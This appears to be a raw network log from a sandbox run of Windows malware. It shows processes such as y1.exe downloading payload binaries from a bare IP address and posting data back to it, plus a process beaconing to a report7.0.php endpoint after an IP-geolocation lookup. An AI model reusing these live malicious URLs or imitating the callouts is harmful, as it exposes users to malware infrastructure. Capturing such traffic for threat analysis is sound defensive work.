location: /watch/57021556/1?wmode=7&page-url=https%3A%2F%2Ftheonlygames.com%2Fcommon%2Ftr%2Fce%2Fland_ce_110720_2_en%2F%3Fhaff_pid%3D3%26haff_oid%3D12%26haff_cid%3D49400000448b6906%26haff_sub1%3Dpu_main%26haff_sub2%3D14575867%26haff_sub3%3D%26haff_tag%3Drs%26utm_source%3Dhooligan&page-ref=https%3A%2F%2Fwww.profitabletrustednetwork.com%2Fe2q8zu9hu%3Fkey%3D0f22c1fd609f13cb7947c8cabfe1a90d%26submetric%3D14575867&charset=utf-8&browser-info=pv%3A1%3Agdpr%3A14%3Avf%3A5gv0p5rfuji4o8hq%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A504%3Acn%3A1%3Adp%3A0%3Als%3A822702808621%3Ahid%3A594640280%3Az%3A0%3Ai%3A20210505193223%3Aet%3A1620243144%3Ac%3A1%3Arn%3A906133048%3Arqn%3A1%3Au%3A1620243144927153438%3Aw%3A800x556%3As%3A1280x720x24%3Ask%3A1%3Aj%3A1%3Ans%3A1620243138053%3Ads%3A0%2C0%2C549%2C8%2C1437%2C0%2C%2C1948%2C1%2C%2C%2C%2C4272%3Adsn%3A0%2C0%2C549%2C8%2C1437%2C0%2C%2C1940%2C1%2C%2C%2C%2C4272%3Awv%3A2%3Arqnl%3A1%3Ati%3A2%3Ast%3A1620243144%3At%3ACuntEmpire
date: Wed, 05 May 2021 17:36:03 GMT
access-control-allow-origin: https://theonlygames.com
set-cookie: yandexuid=6266061011620236163; Expires=Thu, 05-May-2022 17:36:03 GMT; Domain=.yandex.ru; Path=/
set-cookie: yabs-sid=308390541620236163; Path=/
set-cookie: i=wuXYzvZlCt/BnR+tEpK58VO/u1jhaCDG9OWY9K++6Bp+JcrNEXlh9jf8s6OZeekf2rXGikmpZPDyfRFeEkUNl6shN3A=; Expires=Sat, 03-May-2031 17:35:57 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
set-cookie: ymex=1651772163.yrts.1620236163#1651772163.yrtsi.1620236163; Expires=Thu, 05-May-2022 17:36:03 GMT; Domain=.yandex.ru; Path=/
access-control-allow-credentials: true
pragma: no-cache
x-xss-protection: 1; mode=block
expires: Wed, 05-May-2021 17:36:03 GMT
last-modified: Wed, 05-May-2021 17:36:03 GMT
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
strict-transport-security: max-age=31536000
DNS

MicrosoftEdgeCP.exe

Remote address:

77.88.21.119:443

Response

HTTP/2.0 200

content-length: 184
date: Wed, 05 May 2021 17:36:03 GMT
x-content-type-options: nosniff
access-control-allow-origin: https://theonlygames.com
access-control-allow-credentials: true
pragma: no-cache
x-xss-protection: 1; mode=block
expires: Wed, 05-May-2021 17:36:03 GMT
last-modified: Wed, 05-May-2021 17:36:03 GMT
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
content-type: application/json; charset=utf-8
strict-transport-security: max-age=31536000
DNS

MicrosoftEdgeCP.exe

Remote address:

77.88.21.119:443

Response

HTTP/2.0 200

content-length: 43
date: Wed, 05 May 2021 17:36:03 GMT
access-control-allow-origin: *
etag: "608a5251-2b"
expires: Wed, 05 May 2021 18:36:03 GMT
accept-ranges: bytes
last-modified: Fri, 30 Apr 2021 17:14:07 GMT
cache-control: max-age=3600
content-type: image/gif
strict-transport-security: max-age=31536000
DNS

MicrosoftEdgeCP.exe

Remote address:

77.88.21.119:443

Response

HTTP/2.0 200

content-length: 43
date: Wed, 05 May 2021 17:36:03 GMT
access-control-allow-origin: https://theonlygames.com
access-control-allow-credentials: true
pragma: no-cache
x-xss-protection: 1; mode=block
expires: Wed, 05-May-2021 17:36:03 GMT
last-modified: Wed, 05-May-2021 17:36:03 GMT
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
content-type: image/gif
strict-transport-security: max-age=31536000
DNS

MicrosoftEdgeCP.exe

Remote address:

77.88.21.119:443

Response

HTTP/2.0 200

content-length: 43
date: Wed, 05 May 2021 17:36:03 GMT
access-control-allow-origin: https://theonlygames.com
access-control-allow-credentials: true
pragma: no-cache
x-xss-protection: 1; mode=block
expires: Wed, 05-May-2021 17:36:03 GMT
last-modified: Wed, 05-May-2021 17:36:03 GMT
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
content-type: image/gif
strict-transport-security: max-age=31536000
DNS

yourfreecounter.com

Remote address:

8.8.8.8:53

Request

yourfreecounter.com

IN A
DNS

yourfreecounter.com

Remote address:

8.8.8.8:53

Request

yourfreecounter.com

IN A
DNS

yourfreecounter.com

Remote address:

8.8.8.8:53

Request

yourfreecounter.com

IN A
DNS

yourfreecounter.com

Remote address:

8.8.8.8:53

Request

yourfreecounter.com

IN A
DNS

yourfreecounter.com

Remote address:

8.8.8.8:53

Request

yourfreecounter.com

IN A
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/fav.png

MicrosoftEdge.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/fav.png HTTP/2.0
host: theonlygames.com
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
dnt: 1

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:36:02 GMT
content-type: image/png
content-length: 783
set-cookie: __cfduid=d5e9dacb0973c50a312fe100bbd4cbab21620236162; expires=Fri, 04-Jun-21 17:36:02 GMT; path=/; domain=.theonlygames.com; HttpOnly; SameSite=Lax; Secure
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-30f"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4502
accept-ranges: bytes
cf-request-id: 09df32ed6b0000d8ed61951000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=W6Xi9t25bTOPPzmm%2FjjEXK6J7gzbkr0d8ojfQpErC5Z3N08P%2FFYd3fjJuvyZ5riBJ8bsgBd2Kk7NNE3fO2Yw94MxRPfhxFKNQymY8zp1SKGZ"}],"group":"cf-nel"}
nel: {"max_age":604800,"report_to":"cf-nel"}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba8f0d6fd8ed-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
DNS

yandex.ocsp-responder.com

Remote address:

8.8.8.8:53

Request

yandex.ocsp-responder.com

IN A

Response

yandex.ocsp-responder.com

IN CNAME

cdn.yandex.net

cdn.yandex.net

IN A

5.45.205.241

cdn.yandex.net

IN A

5.45.205.242

cdn.yandex.net

IN A

5.45.205.245

cdn.yandex.net

IN A

5.45.205.244

cdn.yandex.net

IN A

5.45.205.243
GET

http://yandex.ocsp-responder.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CEDbEISBuJVGq0KdX46enAhA%3D

MicrosoftEdgeCP.exe

Remote address:

5.45.205.241:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBStniMGfahyWUWDEeSLUFbNR9JLAgQUN1zjGeCyjqGoTtLPq9Dc4wtcNU0CEDbEISBuJVGq0KdX46enAhA%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: yandex.ocsp-responder.com

Response

HTTP/1.1 200 OK

Server: nginx/1.17.9
Date: Wed, 05 May 2021 17:36:02 GMT
Content-Type: application/ocsp-response
Content-Length: 1514
Connection: keep-alive
Keep-Alive: timeout=5
X-Cached: STALE
Cache-Control: max-age=815
DNS

collect.installeranalytics.com

powershell.exe

Remote address:

8.8.8.8:53

Request

collect.installeranalytics.com

IN A

Response

collect.installeranalytics.com

IN A

52.23.109.145

collect.installeranalytics.com

IN A

54.226.29.2
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 167
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:10 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=7rapHFRVc1NqL41F7lovR0JS/tcbDDAFfy2/Wbj8vtDfOy3Bcp1LlCtk36pIzAIuQ0mYyisaPW5nLSveDJuxDjA4kVzAYtHBvaFLQFTSDfIULl3JuhPPz8Ffk13G; Expires=Wed, 12 May 2021 17:36:10 GMT; Path=/
Set-Cookie: AWSALBCORS=7rapHFRVc1NqL41F7lovR0JS/tcbDDAFfy2/Wbj8vtDfOy3Bcp1LlCtk36pIzAIuQ0mYyisaPW5nLSveDJuxDjA4kVzAYtHBvaFLQFTSDfIULl3JuhPPz8Ffk13G; Expires=Wed, 12 May 2021 17:36:10 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

http://35.228.62.50/

y1.exe

Remote address:

35.228.62.50:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:08 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
GET

http://35.228.62.50//l/f/2Dn53HgBuI_ccNKoFpGT/7eb45cf0ef6bdb6630fca53b8e9b36450e2389db

y1.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/2Dn53HgBuI_ccNKoFpGT/7eb45cf0ef6bdb6630fca53b8e9b36450e2389db HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:08 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Thu, 11 Feb 2021 18:55:17 GMT
ETag: "60257d95-dfcff"
Accept-Ranges: bytes
GET

http://35.228.62.50//l/f/2Dn53HgBuI_ccNKoFpGT/919af5f6eff3e9343866c3b5e1443283718317ef

y1.exe

Remote address:

35.228.62.50:80

Request

GET //l/f/2Dn53HgBuI_ccNKoFpGT/919af5f6eff3e9343866c3b5e1443283718317ef HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:11 GMT
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Last-Modified: Thu, 11 Feb 2021 18:55:16 GMT
ETag: "60257d94-2b281b"
Accept-Ranges: bytes
POST

http://35.228.62.50/

y1.exe

Remote address:

35.228.62.50:80

Request

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a
Content-Length: 1249
Host: 35.228.62.50

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:36:13 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
DNS

fbk.xiaomishop.me

SystemNetworkService

Remote address:

8.8.8.8:53

Request

fbk.xiaomishop.me

IN A

Response

fbk.xiaomishop.me

IN A

104.18.9.171

fbk.xiaomishop.me

IN A

104.18.8.171
POST

http://fbk.xiaomishop.me/report7.0.php

SystemNetworkService

Remote address:

104.18.9.171:80

Request

POST /report7.0.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: fbk.xiaomishop.me
Content-Length: 254
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:10 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d6720f8a7ce12d6771cc3d1f7713716931620236169; expires=Fri, 04-Jun-21 17:36:09 GMT; path=/; domain=.xiaomishop.me; HttpOnly; SameSite=Lax
CF-Cache-Status: DYNAMIC
cf-request-id: 09df330ae400001e99ff2cf000000001
Server: cloudflare
CF-RAY: 64abbabe3a381e99-AMS
POST

http://fbk.xiaomishop.me/report7.0.php

SystemNetworkService

Remote address:

104.18.9.171:80

Request

POST /report7.0.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: fbk.xiaomishop.me
Content-Length: 274
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __cfduid=d6720f8a7ce12d6771cc3d1f7713716931620236169

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:29 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
cf-request-id: 09df33581000001e993232e000000001
Server: cloudflare
CF-RAY: 64abbb39bd671e99-AMS
POST

http://fbk.xiaomishop.me/report7.0.php

SystemNetworkService

Remote address:

104.18.9.171:80

Request

POST /report7.0.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: fbk.xiaomishop.me
Content-Length: 250
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __cfduid=d6720f8a7ce12d6771cc3d1f7713716931620236169

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:30 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
cf-request-id: 09df33594700001e9927acc000000001
Server: cloudflare
CF-RAY: 64abbb3baa4d1e99-AMS
DNS

crl.comodoca.com

powershell.exe

Remote address:

8.8.8.8:53

Request

crl.comodoca.com

IN A

Response

crl.comodoca.com

IN A

151.139.128.14
GET

http://crl.comodoca.com/AAACertificateServices.crl

askinstall39.exe

Remote address:

151.139.128.14:80

Request

GET /AAACertificateServices.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: crl.comodoca.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:10 GMT
Content-Type: application/pkix-crl
Last-Modified: Wed, 05 May 2021 05:48:02 GMT
Accept-Ranges: bytes
Server: nginx
ETag: "60923192-1fa"
X-CCACDN-Mirror-ID: sscrl2
Cache-Control: max-age=14400, s-maxage=3600
X-CCACDN-Proxy-ID: mcdpinlb6
X-Frame-Options: SAMEORIGIN
X-HW: 1620236170.cds152.am5.h2,1620236170.cds013.am5.c
Connection: keep-alive
Content-Length: 506
GET

http://ip-api.com/json/?fields=8198

SystemNetworkService

Remote address:

208.95.112.1:80

Request

GET /json/?fields=8198 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 167
Cache-Control: no-cache
Cookie: AWSALB=7rapHFRVc1NqL41F7lovR0JS/tcbDDAFfy2/Wbj8vtDfOy3Bcp1LlCtk36pIzAIuQ0mYyisaPW5nLSveDJuxDjA4kVzAYtHBvaFLQFTSDfIULl3JuhPPz8Ffk13G; AWSALBCORS=7rapHFRVc1NqL41F7lovR0JS/tcbDDAFfy2/Wbj8vtDfOy3Bcp1LlCtk36pIzAIuQ0mYyisaPW5nLSveDJuxDjA4kVzAYtHBvaFLQFTSDfIULl3JuhPPz8Ffk13G

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:11 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=l4OuKgZY3scXrUbmlNlI0+ivD7ioHhjTyDi5jiaJqHLBkMbbN3yVCVRoep8fp5HBLuDALQ30tSiIge8+fzbefnXdHzCVR3knifG0henw0kesJJ52hNzVD47uneiE; Expires=Wed, 12 May 2021 17:36:11 GMT; Path=/
Set-Cookie: AWSALBCORS=l4OuKgZY3scXrUbmlNlI0+ivD7ioHhjTyDi5jiaJqHLBkMbbN3yVCVRoep8fp5HBLuDALQ30tSiIge8+fzbefnXdHzCVR3knifG0henw0kesJJ52hNzVD47uneiE; Expires=Wed, 12 May 2021 17:36:11 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 179
Cache-Control: no-cache
Cookie: AWSALB=l4OuKgZY3scXrUbmlNlI0+ivD7ioHhjTyDi5jiaJqHLBkMbbN3yVCVRoep8fp5HBLuDALQ30tSiIge8+fzbefnXdHzCVR3knifG0henw0kesJJ52hNzVD47uneiE; AWSALBCORS=l4OuKgZY3scXrUbmlNlI0+ivD7ioHhjTyDi5jiaJqHLBkMbbN3yVCVRoep8fp5HBLuDALQ30tSiIge8+fzbefnXdHzCVR3knifG0henw0kesJJ52hNzVD47uneiE

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:11 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=nFL5aem4/NlF9WZOHV7lPS3vvKH1Z3qXyW/wtdneUQNy9uVgAU0Fpspo62UAdneVMNIZ41Zub2dwFIqnx+FZbYCXj0GBkyEWEp6d2hMjZSFPekNHuZefZijxYt8j; Expires=Wed, 12 May 2021 17:36:11 GMT; Path=/
Set-Cookie: AWSALBCORS=nFL5aem4/NlF9WZOHV7lPS3vvKH1Z3qXyW/wtdneUQNy9uVgAU0Fpspo62UAdneVMNIZ41Zub2dwFIqnx+FZbYCXj0GBkyEWEp6d2hMjZSFPekNHuZefZijxYt8j; Expires=Wed, 12 May 2021 17:36:11 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 181
Cache-Control: no-cache
Cookie: AWSALB=nFL5aem4/NlF9WZOHV7lPS3vvKH1Z3qXyW/wtdneUQNy9uVgAU0Fpspo62UAdneVMNIZ41Zub2dwFIqnx+FZbYCXj0GBkyEWEp6d2hMjZSFPekNHuZefZijxYt8j; AWSALBCORS=nFL5aem4/NlF9WZOHV7lPS3vvKH1Z3qXyW/wtdneUQNy9uVgAU0Fpspo62UAdneVMNIZ41Zub2dwFIqnx+FZbYCXj0GBkyEWEp6d2hMjZSFPekNHuZefZijxYt8j

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:11 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=rtkS6gmoOyrWlQRClEk13OkgZpTa1eHvrPaZqiQbrsRFgwVllpsrdn88yRd6F0NpNzz7efZdMWN5cUbPuDyaXDj4hH3QJFAjzCsRalSKieee+LPN6GI3NGE97J4o; Expires=Wed, 12 May 2021 17:36:11 GMT; Path=/
Set-Cookie: AWSALBCORS=rtkS6gmoOyrWlQRClEk13OkgZpTa1eHvrPaZqiQbrsRFgwVllpsrdn88yRd6F0NpNzz7efZdMWN5cUbPuDyaXDj4hH3QJFAjzCsRalSKieee+LPN6GI3NGE97J4o; Expires=Wed, 12 May 2021 17:36:11 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 184
Cache-Control: no-cache
Cookie: AWSALB=rtkS6gmoOyrWlQRClEk13OkgZpTa1eHvrPaZqiQbrsRFgwVllpsrdn88yRd6F0NpNzz7efZdMWN5cUbPuDyaXDj4hH3QJFAjzCsRalSKieee+LPN6GI3NGE97J4o; AWSALBCORS=rtkS6gmoOyrWlQRClEk13OkgZpTa1eHvrPaZqiQbrsRFgwVllpsrdn88yRd6F0NpNzz7efZdMWN5cUbPuDyaXDj4hH3QJFAjzCsRalSKieee+LPN6GI3NGE97J4o

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:11 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=XcaWnEVH9Q86BrJ5i3zYsF/3b9Lg4Qmzmx7FWrov3BiU9WhS/5B9leb7S7FXrdMib4sm/GLR/ec5nfvg3JHiYROaCq1m31W4YgN14w3+9ROQlDhkTF7TyCXT8On8; Expires=Wed, 12 May 2021 17:36:11 GMT; Path=/
Set-Cookie: AWSALBCORS=XcaWnEVH9Q86BrJ5i3zYsF/3b9Lg4Qmzmx7FWrov3BiU9WhS/5B9leb7S7FXrdMib4sm/GLR/ec5nfvg3JHiYROaCq1m31W4YgN14w3+9ROQlDhkTF7TyCXT8On8; Expires=Wed, 12 May 2021 17:36:11 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 180
Cache-Control: no-cache
Cookie: AWSALB=XcaWnEVH9Q86BrJ5i3zYsF/3b9Lg4Qmzmx7FWrov3BiU9WhS/5B9leb7S7FXrdMib4sm/GLR/ec5nfvg3JHiYROaCq1m31W4YgN14w3+9ROQlDhkTF7TyCXT8On8; AWSALBCORS=XcaWnEVH9Q86BrJ5i3zYsF/3b9Lg4Qmzmx7FWrov3BiU9WhS/5B9leb7S7FXrdMib4sm/GLR/ec5nfvg3JHiYROaCq1m31W4YgN14w3+9ROQlDhkTF7TyCXT8On8

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:12 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=nvw4C3fQT7tGzxQrso9jL1gRY9tz1I56/Q+3PQxnPV7G3iUrHNMFt1PQuJffzkapjSf4iFwMfkoQB+u3Y5FiXp3x8ok4U4UJ9sa9F7hDF/7OHFy/CRecY9J2O4km; Expires=Wed, 12 May 2021 17:36:12 GMT; Path=/
Set-Cookie: AWSALBCORS=nvw4C3fQT7tGzxQrso9jL1gRY9tz1I56/Q+3PQxnPV7G3iUrHNMFt1PQuJffzkapjSf4iFwMfkoQB+u3Y5FiXp3x8ok4U4UJ9sa9F7hDF/7OHFy/CRecY9J2O4km; Expires=Wed, 12 May 2021 17:36:12 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 174
Cache-Control: no-cache
Cookie: AWSALB=nvw4C3fQT7tGzxQrso9jL1gRY9tz1I56/Q+3PQxnPV7G3iUrHNMFt1PQuJffzkapjSf4iFwMfkoQB+u3Y5FiXp3x8ok4U4UJ9sa9F7hDF/7OHFy/CRecY9J2O4km; AWSALBCORS=nvw4C3fQT7tGzxQrso9jL1gRY9tz1I56/Q+3PQxnPV7G3iUrHNMFt1PQuJffzkapjSf4iFwMfkoQB+u3Y5FiXp3x8ok4U4UJ9sa9F7hDF/7OHFy/CRecY9J2O4km

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:12 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=cXLDvNI8FWp+T9cD2Wekn9v03GlhDC3HhxLOLmLvZO/LoDrgH47HJPJjuNJ79ay5LnUzBYwYofbxMeBgrvwIMN4KtQ5R6Hwf5wM6hcZr4IX+hnBZKT6KJqbC6BOs; Expires=Wed, 12 May 2021 17:36:12 GMT; Path=/
Set-Cookie: AWSALBCORS=cXLDvNI8FWp+T9cD2Wekn9v03GlhDC3HhxLOLmLvZO/LoDrgH47HJPJjuNJ79ay5LnUzBYwYofbxMeBgrvwIMN4KtQ5R6Hwf5wM6hcZr4IX+hnBZKT6KJqbC6BOs; Expires=Wed, 12 May 2021 17:36:12 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 183
Cache-Control: no-cache
Cookie: AWSALB=cXLDvNI8FWp+T9cD2Wekn9v03GlhDC3HhxLOLmLvZO/LoDrgH47HJPJjuNJ79ay5LnUzBYwYofbxMeBgrvwIMN4KtQ5R6Hwf5wM6hcZr4IX+hnBZKT6KJqbC6BOs; AWSALBCORS=cXLDvNI8FWp+T9cD2Wekn9v03GlhDC3HhxLOLmLvZO/LoDrgH47HJPJjuNJ79ay5LnUzBYwYofbxMeBgrvwIMN4KtQ5R6Hwf5wM6hcZr4IX+hnBZKT6KJqbC6BOs

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:12 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=q8UUcpGWBLiPsy3PILY3ZzRflvazV2hfzTnG4wOyQlIokd8LPpxi97qjq+G53JO86rfAdFUpzi6EhHkPkP3V+bsSx1XmH64uTqOh4ziyyznNRqaOw6lWtNCuOwG9; Expires=Wed, 12 May 2021 17:36:12 GMT; Path=/
Set-Cookie: AWSALBCORS=q8UUcpGWBLiPsy3PILY3ZzRflvazV2hfzTnG4wOyQlIokd8LPpxi97qjq+G53JO86rfAdFUpzi6EhHkPkP3V+bsSx1XmH64uTqOh4ziyyznNRqaOw6lWtNCuOwG9; Expires=Wed, 12 May 2021 17:36:12 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 183
Cache-Control: no-cache
Cookie: AWSALB=q8UUcpGWBLiPsy3PILY3ZzRflvazV2hfzTnG4wOyQlIokd8LPpxi97qjq+G53JO86rfAdFUpzi6EhHkPkP3V+bsSx1XmH64uTqOh4ziyyznNRqaOw6lWtNCuOwG9; AWSALBCORS=q8UUcpGWBLiPsy3PILY3ZzRflvazV2hfzTnG4wOyQlIokd8LPpxi97qjq+G53JO86rfAdFUpzi6EhHkPkP3V+bsSx1XmH64uTqOh4ziyyznNRqaOw6lWtNCuOwG9

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:13 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=EBDpDX/sx0J62ZLQ6QsZk/ylXRu6qYlbOgZPSK3/yX3kKX37a7Xf0fZVBbORNbdiWtnTV/ITWdhYagOVRCrHC6a31EiceWx5AMUyi8yf8RtKXuNxtMdFQ0nqQqWf; Expires=Wed, 12 May 2021 17:36:13 GMT; Path=/
Set-Cookie: AWSALBCORS=EBDpDX/sx0J62ZLQ6QsZk/ylXRu6qYlbOgZPSK3/yX3kKX37a7Xf0fZVBbORNbdiWtnTV/ITWdhYagOVRCrHC6a31EiceWx5AMUyi8yf8RtKXuNxtMdFQ0nqQqWf; Expires=Wed, 12 May 2021 17:36:13 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 183
Cache-Control: no-cache
